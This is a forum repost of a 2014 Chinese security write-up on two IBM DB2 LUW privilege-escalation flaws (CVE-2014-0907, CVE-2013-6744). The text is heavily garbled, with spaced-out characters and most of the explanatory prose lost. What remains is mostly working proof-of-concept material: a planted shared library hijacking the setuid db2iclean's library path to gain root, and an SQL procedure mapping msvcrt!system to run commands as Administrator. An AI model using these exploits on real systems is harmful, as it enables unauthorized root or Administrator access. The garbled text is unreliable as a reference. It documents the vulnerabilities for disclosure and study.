[8282] 2014-09-18_两枚近期IBMDB2LUW漏洞提权分析

文档创建者:s7ckTeam
浏览次数:33
最后更新:2025-01-17
2014-09-18_两枚近期IBMDB2LUW漏洞提权分析 I B M   D B 2   L U W x i a 0 k   F r e e B u f   2 0 1 4 - 0 9 - 1 8 I B M D B 2 l i n u x u n i x w i n d o w s C V E - 2 0 1 4 - 0 9 0 7 C V E - 2 0 1 3 - 6 7 4 4 C V E - 2 0 1 4 - 0 9 0 7 D B 2 D B 2 ~ r o o t C V E I B M $ c d   < D B 2 _ i n s t a n c e _ i n s t a l l _ d i r e c t o r y > $ b i n / d b 2 c h g l i b p a t h   - s   ' . : '   - r   ' '   a d m / d b 2 i c l e a n   d b 2 c h g l i b p a t h d b 2 c h g l i b p a t h d b 2 i c l e a n $   s u d o   s t r a c e   - o   / t m p / d b 2 i c l e a n . l o g     $ / h o m e / d b 2 i n s t 1 / s q l l i b / a d m / d b 2 i c l e a n $   c a t   / t m p / d b 2 i c l e a n . l o g   |   m o r e . . . a c c e s s ( " / e t c / l d . s o . p r e l o a d " ,   R _ O K )             =   - 1   E N O E N T   ( N o   s u c h   f i l e   o r   d i r e c t o r y ) o p e n ( " . / t l s / i 6 8 6 / s s e 2 / c m o v / l i b d b 2 u r e 2 . s o . 1 " ,   O _ R D O N L Y | O _ C L O E X E C )   =   - 1   E N O E N T   ( N o   s u c h   f i l e   o r   d i r e c t o r y ) . . . o p e n ( " . / c m o v / l i b d b 2 u r e 2 . s o . 1 " ,   O _ R D O N L Y | O _ C L O E X E C )   =   - 1   E N O E N T   ( N o   s u c h   f i l e   o r   d i r e c t o r y ) o p e n ( " . / l i b d b 2 u r e 2 . s o . 1 " ,   O _ R D O N L Y | O _ C L O E X E C )   =   - 1   E N O E N T   ( N o   s u c h   f i l e   o r   d i r e c t o r y ) o p e n ( " / D o N o t C r e a t e T h i s P a t h _ m a r k e r 1 . * c h g l i b p a t h / t l s / i 6 8 6 / s s e 2 / c m o v / l i b d b 2 u r e 2 . s o . 1 " ,   O _ R D O N L Y | O _ C L O E X E C )   =   - 1   E N O E N T   ( N o   s u c h   f i l e   o r   d i r e c t o r y ) . . . l i b d b 2 u r e 2 . s o . 1 D B 2 d b 2 i c l e a n r o o t r o o t d b 2 c l e a n
使 d b 2 a d m 1 使 P O C D B 2 / /   l i b d b 2 u r e 2 . c p p # i n c l u d e   < s t d l i b . h > i n t   i G e t H o s t N a m e ( c h a r *   n ,   i n t   i ) {         s y s t e m ( " i d   >   / m . l o g " ) ; } d b 2 i c l e a n $   g c c   - s h a r e d   - o   l i b d b 2 u r e 2 . s o . 1   l i b d b 2 u r e 2 . c p p d b 2 i c l e a n < D B 2 _ i n s t a n c e _ i n s t a l l _ d i r e c t o r y > / a d m / d b 2 i c l e a n $   c a t   / m . l o g u i d = 1 0 0 4 ( j a m e s )   g i d = 1 0 0 1 ( j a m e s )   e u i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) , 1 2 6 ( d b 2 i a d m 1 ) , 1 0 0 1 ( j a m e s ) E U I D r o o t I B M S U I D 广
R P A T H r u n t i m e   l i b r a r y   p a t h h t t p : / / e n . w i k i p e d i a . o r g / w i k i / R p a t h ( C V E - 2 0 1 3 - 6 7 4 4 )   D B 2 l i n u x w i n 使 w i n d o w s A d m i n i s t r a t o r 1 2 C O N N E C T   p r i v i l e g e 3 r o u t i n e C R E A T E _ E X T E R N A L _ R O U T I N E W i n d o w s D B 2 访 C R E A T E _ E X T E R N A L _ R O U T I N E P O C 1 D B 2   L U W 1 0 . 1   F i x   P a c k   1 2 D B 2 C R E A T E _ E X T E R N A L _ R O U T I N E D D L C   r u n t i m e   s y s t e m C R E A T E   P R O C E D U R E   d b 2 _ e x e c   ( I N   c m d   v a r c h a r ( 1 0 2 4 ) )   E X T E R N A L   N A M E   ' m s v c r t ! s y s t e m '   L A N G U A G E   C   D E T E R M I N I S T I C   P A R A M E T E R   S T Y L E   D B 2 S Q L C A L L   d b 2 _ e x e c ( ' w h o a m i   / a l l   >   C : w h o a m i . l o g ' ) l o g d b 2 a d m i n A d m i n i s t r a t o r w i n W i n d o w s l i n u x ~ ~ I B M C R E A T E _ E X T E R N A L _ R O U T I N E [ s p i d e r l a b s . c o m F r e e B u f x i a 0 k F r e e B u f . C O M ]

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则